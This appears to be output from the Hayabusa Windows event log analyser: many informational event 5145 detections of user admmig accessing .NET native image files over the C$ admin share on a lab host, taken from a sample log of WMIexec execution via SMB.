10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 
